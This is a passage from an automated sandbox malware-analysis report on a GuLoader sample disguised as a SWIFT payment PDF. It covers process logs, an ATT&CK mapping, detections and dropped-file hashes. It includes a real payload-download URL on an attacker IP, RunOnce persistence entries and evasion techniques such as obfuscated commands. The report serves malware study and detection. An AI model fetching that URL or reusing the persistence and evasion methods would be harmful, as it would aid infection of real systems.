          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 6_2_00405B99 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,6_2_00405B99

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Command and Scripting Interpreter          		1
          Registry Run Keys / Startup Folder          		11
          Process Injection          		11
          Masquerading          		OS Credential Dumping111
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		1
          Encrypted Channel          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Native API          		1
          DLL Side-Loading          		1
          Registry Run Keys / Startup Folder          		1
          Virtualization/Sandbox Evasion          		LSASS Memory1
          Virtualization/Sandbox Evasion          		Remote Desktop Protocol1
          Clipboard Data          		1
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading          		11
          Process Injection          		Security Account Manager1
          Time Based Evasion          		SMB/Windows Admin SharesData from Network Shared Drive1
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
          Deobfuscate/Decode Files or Information          		NTDS4
          File and Directory Discovery          		Distributed Component Object ModelInput Capture11
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Time Based Evasion          		LSA Secrets3
          System Information Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Obfuscated Files or Information          		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1432107 Sample: SWIFTCOPYMT1030000000_pdf.exe Startdate: 26/04/2024 Architecture: WINDOWS Score: 96 43 Multi AV Scanner detection for dropped file 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 Yara detected GuLoader 2->47 49 4 other signatures 2->49 7 SWIFTCOPYMT1030000000_pdf.exe 4 39 2->7         started        process3 file4 35 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 7->35 dropped 37 C:\Users\user\AppData\Local\...\System.dll, PE32 7->37 dropped 51 Obfuscated command line found 7->51 53 Mass process execution to delay analysis 7->53 11 SWIFTCOPYMT1030000000_pdf.exe 1 8 7->11         started        15 cmd.exe 7->15         started        17 cmd.exe 7->17         started        19 62 other processes 7->19 signatures5 process6 dnsIp7 41 94.156.8.104, 50341, 80 NET1-ASBG Bulgaria 11->41 39 C:\Users\user\AppData\...39onaddicting.exe, PE32 11->39 dropped 21 WerFault.exe 11->21         started        23 Conhost.exe 15->23         started        25 Conhost.exe 17->25         started        27 Conhost.exe 19->27         started        29 Conhost.exe 19->29         started        31 Conhost.exe 19->31         started        33 59 other processes 19->33 file8 process9

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SWIFTCOPYMT1030000000_pdf.exe16%ReversingLabsWin32.Trojan.InjectorX
          SWIFTCOPYMT1030000000_pdf.exe36%VirustotalBrowse
          SWIFTCOPYMT1030000000_pdf.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\Drikkelse\Nonaddicting.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\Drikkelse\Nonaddicting.exe16%ReversingLabsWin32.Trojan.InjectorX
          C:\Users\user\AppData\Local\Temp\Drikkelse\Nonaddicting.exe36%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll1%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\nsExec.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\nsExec.dll1%VirustotalBrowse

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://94.156.8.104/yFtqL16.binApokOpt103.78.0.98/yFtqL16.bin0%Avira URL Cloudsafe
          http://94.156.8.104/yFtqL16.bin0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://94.156.8.104/yFtqL16.binfalse
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://nsis.sf.net/NSIS_ErrorSWIFTCOPYMT1030000000_pdf.exe, SWIFTCOPYMT1030000000_pdf.exe, 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpfalse
            		high
            http://nsis.sf.net/NSIS_ErrorErrorSWIFTCOPYMT1030000000_pdf.exe, 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp, SWIFTCOPYMT1030000000_pdf.exe, 00000006.00000000.133684224870.0000000000409000.00000008.00000001.01000000.00000004.sdmp, SWIFTCOPYMT1030000000_pdf.exe, 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpfalse
              		high
              http://94.156.8.104/yFtqL16.binApokOpt103.78.0.98/yFtqL16.binSWIFTCOPYMT1030000000_pdf.exe, 00000088.00000002.134626594503.0000000009280000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              94.156.8.104
              		unknownBulgaria
              		43561NET1-ASBGfalse

              General Information

              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1432107
              Start date and time:2024-04-26 13:36:20 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 15m 33s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
              Run name:Suspected Instruction Hammering
              Number of analysed new started processes analysed:142
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:SWIFTCOPYMT1030000000_pdf.exe
              Detection:MAL
              Classification:mal96.troj.evad.winEXE@396/18@0/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 87%
              • Number of executed functions: 46
              • Number of non-executed functions: 62
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

              Warnings

              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 52.182.143.212
              • Excluded domains from analysis (whitelisted): spclient.wg.spotify.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com
              • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtWriteVirtualMemory calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              12:39:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Blankbook C:\Users\user\AppData\Local\Temp\Drikkelse\Nonaddicting.exe
              12:39:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Blankbook C:\Users\user\AppData\Local\Temp\Drikkelse\Nonaddicting.exe

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              94.156.8.104PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeGet hashmaliciousGuLoader, RemcosBrowse
              • 94.156.8.104/yhHZZNqAePDSUakAFmHWn151.bin

              Domains

              No context

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              NET1-ASBGPURCHASEORDERSHEET&SPECIFICATIONSDOC.exeGet hashmaliciousGuLoader, RemcosBrowse
              • 94.156.8.104
              DHL_ES567436735845755676678877988975877.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
              • 87.121.105.163
              xtnhsVjQTxvH.exeGet hashmaliciousQuasarBrowse
              • 94.156.79.26
              o4883TEQGB.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.156.8.9
              Id2uxwyyf8.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.156.8.9
              Y4pblBbDQc.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.156.8.9
              C5fMgX1ZyY.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.156.8.9
              6fV4tfoJp2.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.156.8.9
              fqEpqMWF6r.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.156.8.9
              D0dhEeGfv4.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.156.8.9

              JA3 Fingerprints

              No context

              Dropped Files

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\nsExec.dllPURCHASEORDERSHEET&SPECIFICATIONSDOC.exeGet hashmaliciousGuLoader, RemcosBrowse
                PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeGet hashmaliciousGuLoaderBrowse
                  C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dllPURCHASEORDERSHEET&SPECIFICATIONSDOC.exeGet hashmaliciousGuLoader, RemcosBrowse
                    PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeGet hashmaliciousGuLoaderBrowse
                      seDzEfSLFg.exeGet hashmaliciousGuLoaderBrowse
                        seDzEfSLFg.exeGet hashmaliciousGuLoaderBrowse
                          Sipari#U015f_#U00d6zellikleri.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            Sipari#U015f_#U00d6zellikleri.exeGet hashmaliciousGuLoaderBrowse
                              Factura_0104109174pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                Factura_0104109174pdf.exeGet hashmaliciousGuLoaderBrowse
                                  Transferencia.exeGet hashmaliciousFormBook, GuLoaderBrowse

                                    Created / dropped Files

                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SWIFTCOPYMT10300_b9e5f432cb9f1954977155ad8a81be740fe4f69_4d2b002c_27de1eb3-8436-4619-8df8-ea2aad8a21e4\Report.wer

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):1.007088769936823
                                    Encrypted:false
                                    SSDEEP:192:a2bgXx9emod9hKjYhvj2IDu76ffAIO83:IXr3od9hKjSDu76ffAIO83
                                    MD5:B4338B2F0CEFBEF9F598789C91B201CA
                                    SHA1:D5A0596BE6A009BC9DA13AF5DF79CE73BABAC543
                                    SHA-256:95AAA5190F0C73E3A06DAD1B066B2666D6AB7DC5B39C435F747076B16A363466
                                    SHA-512:0DD6630D2DE0B6802D697AFA6B94C54DAF8A13C95592D1CCD7DC0B340FB775FF3932C968D005B812AF8529D2301104A848F816AFCF98480300E71E825E6D3637
                                    Malicious:false
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.6.0.5.1.6.2.1.0.5.2.9.6.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.6.0.5.1.6.2.4.6.4.5.8.4.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.7.d.e.1.e.b.3.-.8.4.3.6.-.4.6.1.9.-.8.d.f.8.-.e.a.2.a.a.d.8.a.2.1.e.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.9.1.1.0.e.2.b.-.5.c.e.c.-.4.3.9.7.-.b.a.a.c.-.9.f.c.0.c.7.5.b.3.8.1.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.W.I.F.T.C.O.P.Y.M.T.1.0.3.0.0.0.0.0.0.0._.p.d.f...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.f.4.-.0.0.0.1.-.0.0.2.7.-.1.c.4.4.-.8.0.5.8.c.e.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.8.9.4.a.9.2.1.2.9.d.4.7.9.9.d.4.d.5.7.e.b.5.1.c.e.2.6.d.c.3.0.0.0.0.0.9.0.4.!.0.0.0.0.8.a.3.3.7.0.d.0.1.a.1.7.0.6.2.6.e.f.4.3.2.0.2.f.5.f.e.5.4.e.2.7.3.7.2.a.b.e.c.4.!.S.W.I.F.T.C.O.P.Y.M.T.1.0.3.0.

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERF676.tmp.dmp

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 14 streams, Fri Apr 26 11:39:22 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):89228
                                    Entropy (8bit):1.9852446809809239
                                    Encrypted:false
                                    SSDEEP:384:rlh7p+9QZFICttAG1LXIILMS3JeyugLERYLs8RBF6qkx:n7p+9Q3ICgG1DT15udRYLrnM/
                                    MD5:E34E1D319E034A895D1227CB365DA2CF
                                    SHA1:E613250454A839297CA68316A2894447DF496081
                                    SHA-256:A2C112A76D1E47530B0BC7B69BE56CC02BE8557776C9D3F06D6207C941FFAF5E
                                    SHA-512:4DE93FDE47A1DF4432CA5EB203B01C17A6BEF5539BBE7C8CD0005F0249B70FAFB0606DACEE74BB0500CE69826242A7B203DB7AAE2FDAE512D10E22AF8BD065DA
                                    Malicious:false
                                    Preview:MDMP..a..... .......j.+f........................................ZF..........T.......8...........T............0...,....................... ..............................................................................bJ......d!......GenuineIntel...........T...........Z.+f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERF703.tmp.WERInternalMetadata.xml

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8516
                                    Entropy (8bit):3.704002012904152
                                    Encrypted:false
                                    SSDEEP:192:R9l7lZNiwu6E6YMf6xgmfFbbmjpDG89bsEsfokm:R9lnNiB6E6Ys6xgmfFbys3f6
                                    MD5:F7D315440C68A94937FFF06A00F6D313
                                    SHA1:F70FFB0FC3D714F6A4D07A9D4A7518ED58E53228
                                    SHA-256:2F35E501EFD3DC66DF9222E52B28CBD209BA2B59854CDB6DF418DDEAA9C727BD
                                    SHA-512:FAE0E3AD9122A8A2FB4A1FCE9A39F78F794269C3802DAECBC46DFC732EABF2C9916C3082D655CC3F5292089DE5AC3FC386EB0F06EBB1991E2DEBB85AE9254253
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.2.6.8.<./.P.i.

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERF743.tmp.xml

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4939
                                    Entropy (8bit):4.54664521029274
                                    Encrypted:false
                                    SSDEEP:48:cvIwwtl8zs0e702I7VFJ5WS2CfjkDs3rm8M4Jq5CFLE+q8v95Nrdm683hd:uILfZ7GySPfHJAK15mp3hd
                                    MD5:DDA7A1B7B3D4D8A0679B33F39E8251A8
                                    SHA1:ADE3F42C1BE7A171D6FA32611B59217ACFAFB550
                                    SHA-256:7890169558DC3FEB77AE210A69AFA501EE9AF5C6D8A337CF9386B2768921C1D1
                                    SHA-512:969668C1AF980257960430BC587C734CF4F65A351186BD4A856AF6A17B73C8F292BC4727471B82B4969DDCF25A18CB8C8D613F01C0A8A98A2505B1383B2782BA
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222640610" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

                                    C:\Users\user\AppData\Local\Temp\Drikkelse\Nonaddicting.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                    Category:dropped
                                    Size (bytes):421592
                                    Entropy (8bit):7.682325489967793
                                    Encrypted:false
                                    SSDEEP:6144:TzZzycMVGAnF3KMrbYTE6ZudWKJJGGCaSninelmgkpmcqaw/cXraHvfMV:5V9QF3ihgxtdel+jw/ar4vm
                                    MD5:1048340BCFAE30DF032C161AC52F8F0E
                                    SHA1:8A3370D01A170626EF43202F5FE54E27372ABEC4
                                    SHA-256:47A75BA2CC69F372C816FB61D079EBE6E3A81EEEB16E72726725B088A59F4E94
                                    SHA-512:446B5293FE99200305CDE7B4EAF17613B6C211AC46CE5EF38D383546C727DE348F6F4733051674CE309A1ED401941985120B0F80F449239D3375F91A2DE2704C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 16%
                                    • Antivirus: Virustotal, Detection: 36%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<`..x...x...x......z...x..........i...,"..t.......y...Richx...........................PE..L....e.Q.................\....9......0.......p....@...........................=.............................................s........;..............d..H............................................................p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data.....9..........r..............@....ndata.......0:..........................rsrc.........;......v..............@..@................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll

                                    Download File
                                    Process:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):11264
                                    Entropy (8bit):5.724200018297216
                                    Encrypted:false
                                    SSDEEP:96:qIsUxO9udx4qYp7AJb76BykUbQMtHUOA5Iv+RnsrqeXV+d1g2IW9t2c+cEwF9Fug:ZVL7ikJb76BQUoUm+RnyXVYO2RvHFug
                                    MD5:6AD39193ED20078AA1B23C33A1E48859
                                    SHA1:95E70E4F47AA1689CC08AFBDAEF3EC323B5342FA
                                    SHA-256:B9631423A50C666FAF2CC6901C5A8D6EB2FECD306FDD2524256B7E2E37B251C2
                                    SHA-512:78C89BB8C86F3B68E5314467ECA4E8E922D143335081FA66B01D756303E1AEC68ED01F4BE7098DBE06A789CA32A0F31102F5BA408BC5AB28E61251611BB4F62B
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    • Antivirus: Virustotal, Detection: 1%, Browse
                                    Joe Sandbox View:
                                    • Filename: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, Detection: malicious, Browse
                                    • Filename: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, Detection: malicious, Browse
                                    • Filename: seDzEfSLFg.exe, Detection: malicious, Browse
                                    • Filename: seDzEfSLFg.exe, Detection: malicious, Browse
                                    • Filename: Sipari#U015f_#U00d6zellikleri.exe, Detection: malicious, Browse
                                    • Filename: Sipari#U015f_#U00d6zellikleri.exe, Detection: malicious, Browse
                                    • Filename: Factura_0104109174pdf.exe, Detection: malicious, Browse
                                    • Filename: Factura_0104109174pdf.exe, Detection: malicious, Browse
                                    • Filename: Transferencia.exe, Detection: malicious, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L....e.Q...........!.................&.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............................... ..`.rdata..C....0......."..............@..@.data...h....@.......&..............@....reloc..H....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\nsExec.dll

                                    Download File
                                    Process:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):6656
                                    Entropy (8bit):5.028420190047439
                                    Encrypted:false
                                    SSDEEP:96:Q7GUaYNwCLuGFctpiKFlYJ8hH4RVHpwdEeY3kRlDr6dMqqyVgNF38:aygp3FcHi0xhYMR8dMqJVgN
                                    MD5:052A077EE8B519AADBCF29E6B5E710A4
                                    SHA1:B3AB29D0EBDBDCA63E4DFFD2FD2E6B9188FFAE4B
                                    SHA-256:9A1A5C6F598247BFA52624CD793B9EF4FB85863CC9DFD69EB7EF671CACC906C9
                                    SHA-512:CB11CBA331B85122DCC2D57171CE20382AF0A9FDF0A85A30155404D975901A313C9285EB9445E51979C6EC8416CCDF97FDEAF1BD2203C9395AD046A385A90009
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    • Antivirus: Virustotal, Detection: 1%, Browse
                                    Joe Sandbox View:
                                    • Filename: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, Detection: malicious, Browse
                                    • Filename: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, Detection: malicious, Browse
